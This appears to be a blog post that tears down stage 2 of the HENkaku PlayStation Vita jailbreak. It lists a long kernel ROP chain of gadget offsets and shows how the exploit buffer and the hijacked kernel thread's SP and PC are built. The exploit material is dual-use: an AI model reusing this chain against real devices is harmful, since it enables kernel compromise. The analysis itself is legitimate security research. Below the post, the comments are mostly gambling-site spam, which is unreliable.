	0x00(x_stack + 0x00008B5C) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B60) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008B64) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B68) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008B6C) = scesysmem_base + 0x0001FDC5
	0x00(x_stack + 0x00008B70) = scesysmem_base + 0x0001D8DB
	0x00(x_stack + 0x00008B74) = scesysmem_base + 0x00019399
	0x00(x_stack + 0x00008B78) = scesysmem_base + 0x00019399
	0x00(x_stack + 0x00008B7C) = scesysmem_base + 0x00011C5F
	0x00(x_stack + 0x00008B80) = scesysmem_base + 0x00019399
	0x00(x_stack + 0x00008B84) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B88) = scesysmem_base + 0x0000B913
	0x00(x_stack + 0x00008B8C) = 0x00000000
	0x00(x_stack + 0x00008B90) = scesysmem_base + 0x0001EFE1
	0x00(x_stack + 0x00008B94) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B98) = scesysmem_base + 0x00001861
	0x00(x_stack + 0x00008B9C) = scesysmem_base + 0x0001FC6D
	0x00(x_stack + 0x00008BA0) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008BA4) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008BA8) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008BAC) = scesysmem_base + 0x00019399
	0x00(x_stack + 0x00008BB0) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008BB4) = scesysmem_base + 0x00019399
	0x00(x_stack + 0x00008BB8) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008BBC) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008BC0) = scesysmem_base + 0x0001614D
	0x00(x_stack + 0x00008BC4) = scesysmem_base + 0x000233D3
	0x00(x_stack + 0x00008BC8) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008BCC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008BD0) = scesysmem_base + 0x000000AF
	0x00(x_stack + 0x00008BD4) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008BD8) = scesysmem_base + 0x0001EFE1
	0x00(x_stack + 0x00008BDC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008BE0) = scesysmem_base + 0x000050E9
	0x00(x_stack + 0x00008BE4) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008BE8) = scesysmem_base + 0x00001347
	0x00(x_stack + 0x00008BEC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008BF0) = scesysmem_base + 0x000000B9
	0x00(x_stack + 0x00008BF4) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008BF8) = scesysmem_base + 0x00001347
	0x00(x_stack + 0x00008BFC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C00) = scesysmem_base + 0x0000039B
	0x00(x_stack + 0x00008C04) = kern_code
	0x00(x_stack + 0x00008C08) = scesysmem_base + 0x0001CB95
	0x00(x_stack + 0x00008C0C) = scesysmem_base + 0x0001EA93
	0x00(x_stack + 0x00008C10) = scesysmem_base + 0x00001411
	0x00(x_stack + 0x00008C14) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C18) = scesysmem_base + 0x000209D7
	0x00(x_stack + 0x00008C1C) = scesysmem_base + 0x000209D3
	0x00(x_stack + 0x00008C20) = scesysmem_base + 0x00001411
	0x00(x_stack + 0x00008C24) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C28) = scesysmem_base + 0x0001BAF5
	0x00(x_stack + 0x00008C2C) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008C30) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C34) = scesysmem_base + 0x0000652B
	0x00(x_stack + 0x00008C38) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C3C) = scesysmem_base + 0x0001BAF5
	0x00(x_stack + 0x00008C40) = scesysmem_base + 0x00022A49
	0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
	0x00(x_stack + 0x00008C48) = scesysmem_base + 0x0000039B
	0x00(x_stack + 0x00008C5C) = 0x00000040
	0x00(x_stack + 0x00008C50) = scesysmem_base + 0x00022A49
	0x00(x_stack + 0x00008C54) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C58) = scesysmem_base + 0x0000652B
	0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C60) = scesysmem_base + 0x0000039B
	0x00(x_stack + 0x00008C64) = 0x00000040
	0x00(x_stack + 0x00008C68) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008C70) = scesysmem_base + 0x0001D9EB
	0x00(x_stack + 0x00008C74) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008C78) = scesysmem_base + 0x00000853
	0x00(x_stack + 0x00008C7C) = scesysmem_base + 0x0001D8DB
	0x00(x_stack + 0x00008C80) = 0x00000038
	0x00(x_stack + 0x00008C84) = scesysmem_base + 0x000000AB
	0x00(x_stack + 0x00008C88) = scesysmem_base + 0x000000D1
	0x00(x_stack + 0x00008C8C) = scesysmem_base + 0x0002328B
	0x00(x_stack + 0x00008C90) = scesysmem_base + 0x00022FCD
	0x00(x_stack + 0x00008C94) = scesysmem_base + 0x000000D1
	0x00(x_stack + 0x00008C98) = scesysmem_base + 0x0001EFF1
	0x00(x_stack + 0x00008C9C) = scesysmem_base + 0x0002A117
	0x00(x_stack + 0x00008CA0) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008CA4) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008CA8) = scesysmem_base + 0x00019399
	0x00(x_stack + 0x00008CAC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008CB0) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008CB4) = scesysmem_base + 0x0001BF1F
	0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
	0x00(x_stack + 0x00008CBC) = scesysmem_base + 0x0000039B
	0x00(x_stack + 0x00008CC0) = 0x00000240
	0x00(x_stack + 0x00008CC4) = scesysmem_base + 0x00022A49
	0x00(x_stack + 0x00008CC8) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008CCC) = scesysmem_base + 0x00003D73
	0x00(x_stack + 0x00008CD0) = 0x00000000
	0x00(x_stack + 0x00008CD4) = scesysmem_base + 0x000021FD
	0x00(x_stack + 0x00008CD8) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008CDC) = scesysmem_base + 0x000050E9
	0x00(x_stack + 0x00008CE0) = scesysmem_base + 0x00000AE1
	0x00(x_stack + 0x00008CE4) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008CE8) = scesysmem_base + 0x0002A117
	0x00(x_stack + 0x00008CEC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008CF0) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008CF4) = scesysmem_base + 0x00000067
	0x00(x_stack + 0x00008CF8) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008CFC) = scesysmem_base + 0x0001BF47
	0x00(x_stack + 0x00008D00) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008D04) = scesysmem_base + 0x000050E9
	0x00(x_stack + 0x00008D08) = scesysmem_base + 0x0000AF33
	0x00(x_stack + 0x00008D0C) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008D10) = scesysmem_base + 0x0001D9EB
	0x00(x_stack + 0x00008D14) = kern_next_payload
	0x00(x_stack + 0x00008D18) = scesysmem_base + 0x0001FC6D
	0x00(x_stack + 0x00008D1C) = scesysmem_base + 0x0000EA73
	0x00(x_stack + 0x00008D20) = scesysmem_base + 0x0000039B
	0x00(x_stack + 0x00008D24) = scesysmem_base + 0x00000853
	0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
	0x00(x_stack + 0x00008D2C) = 0x08106803
	0x00(x_stack + 0x00008D30) = scesysmem_base + 0x000233D3
	0x00(x_stack + 0x00008D34) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008D38) = scesysmem_base + 0x00000433
	0x00(x_stack + 0x00008D3C) = scesysmem_base + 0x000233D3
	0x00(x_stack + 0x00008D40) = scesysmem_base + 0x000150A3
	0x00(x_stack + 0x00008D44) = 0x00000000
	0x00(x_stack + 0x00008D48) = scesysmem_base + 0x0000A74D
	0x00(x_stack + 0x00008D4C) = scesysmem_base + 0x00000000
	0x00(x_stack + 0x00008D50) = scesysmem_base + 0x00000853
	0x00(x_stack + 0x00008D54) = scesysmem_base + 0x0001BF1F
	0x00(x_stack + 0x00008D58) = 0x00000200
	0x00(x_stack + 0x00008D5C) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008D60) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008D64) = scesysmem_base + 0x000050E9
	0x00(x_stack + 0x00008D68) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008D6C) = scesysmem_base + 0x00022FCD
	0x00(x_stack + 0x00008D70) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008D74) = scesysmem_base + 0x00000853
	0x00(x_stack + 0x00008D78) = scesysmem_base + 0x00011C5F

view raw henkaku_stage2_rop.txt hosted with ❤ by GitHub

Now we copy the chain from the stack into the buffer that's being sent through sceIoDevctl:

// Copy kernel ROP chain
memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);

// Copy the first 0x400 bytes of "obfuscated" data

// and append them at the bottom of the ROP chain

memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);

And so, the final input buffer will look like this:

// SceSysmem address
// Unknown pointer written right on top of the input buffer

0x00(x_stack + 0x00007444) = scesysmem_base + 0x0001E460

// Kernel ROP chain

0x00(x_stack + 0x00007448) = 0xXXXXXXXX;

...

0x00(x_stack + 0x00007734) = 0xXXXXXXXX;

// A few NULLs for padding

0x00(x_stack + 0x00007738) = 0x00000000;

0x00(x_stack + 0x0000773C) = 0x00000000;

0x00(x_stack + 0x00007740) = 0x00000000;

// Encrypted kernel code

// Only the first 0x100 bytes will fit in the buffer

0x00(x_stack + 0x00007744) = 0xXXXXXXXX;

...

0x00(x_stack + 0x00007B44) = 0xXXXXXXXX;

Finally, we must craft a buffer that will have our ROP chain's SP and PC. This is the buffer we feed the SceNet exploit with:

// Set kernel thread SP, PC, UNK
0x00(x_stack + 0x0000884C) = sceiofilemgr_stack_base + 0x000006F8 + 0x00000004 // SP

0x00(x_stack + 0x00008850) = scesysmem_base + 0x00000347 // PC

0x00(x_stack + 0x00008858) = sceiofilemgr_stack_base + 0x000006DC // UNK

When the SceNet exploit finishes, we should have hijacked a kernel thread inside the SceNetPs module and overwritten it's stack contents with our own.

This results in the kernel jumping to scesysmem_base + 0x00000347 (which is very likely a POP {PC} gadget) and executing our ROP chain at sceiofilemgr_stack_base + 0x000006F8 + 0x00000004 (which translates to kern_rop + 0x04).

To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the rest of HENkaku's code.

Next up, stage 3!

17 comments:

BahamuthJuly 31, 2021 at 3:00 PM
Hello, I need a contact to you and a few other people, which you know quiet well. I don't know, what I can write here, so I will not write anything about the reason, until you or one of the people which I mean, tell me something like a safe channel (not because of me, but because of you, and I would accept every kind of), where you would allow me, to tell you the reason why I need a contact to you. I please you just to listen/read a few moments and then maybe to reply me something. I really please you for that. Kind regards
스포츠 토토 사이트웹April 19, 2022 at 10:43 AM
스포츠토토

안전놀이터

I’m not sure why but this blog is loading incredibly slow for me.
Is anyone else having this issue or is it a problem on my end?

I’ll check back later and see if the problem still exists.
slotplaygroundMarch 2, 2024 at 11:00 PM

Very useful information shared in this article, nicely written`
스포츠 토토사이트April 20, 2024 at 11:20 PM
I simply wish to give you a huge thumbs up for your excellent info
gostopsite.comApril 20, 2024 at 11:20 PM
Your article has answered the question I was wondering about!
sportstotomen.comApril 20, 2024 at 11:21 PM
There are articles and photos on these topics on my homepage, so please visit and share your opinions.
19guide03.comApril 20, 2024 at 11:22 PM
I hope we can do it together next time.
edwardsrailcar.comApril 20, 2024 at 11:23 PM
wow, awesome blog post. Much thanks again.
cmriindia.orgApril 20, 2024 at 11:23 PM
Have you thought about another topic to post?
카지노사이트July 9, 2024 at 11:33 PM
Pretty! This has been an extremely wonderful post. Many thanks for providing this info.
카지노사이트September 5, 2024 at 2:47 AM
It looks like you spend a lot of effort and time on your blog.
메이저사이트September 5, 2024 at 2:47 AM
I’m really glad I have found this information.
파워볼게임September 5, 2024 at 2:48 AM
Nice site you got here, very awesome and good content.
바카라사이트January 7, 2025 at 11:14 PM
You know how to get your readers' attention. 바카라사이트
파워볼사이트January 7, 2025 at 11:14 PM
Thanks for this blog, I really enjoyed reading your post. 파워볼사이트
먹튀검증가이드January 12, 2025 at 1:18 AM

Fantastic article. I like your writing style. It’s inspiring and I am truly grateful for the writing style
Macey CrossJanuary 19, 2025 at 4:13 AM
This is a fascinating explanation of how Stage 2 works.

Hacking the planet...

Wednesday, October 19, 2016

HENkaku - Exploit teardown - Stage 2

HENkaku - Stage 2

17 comments: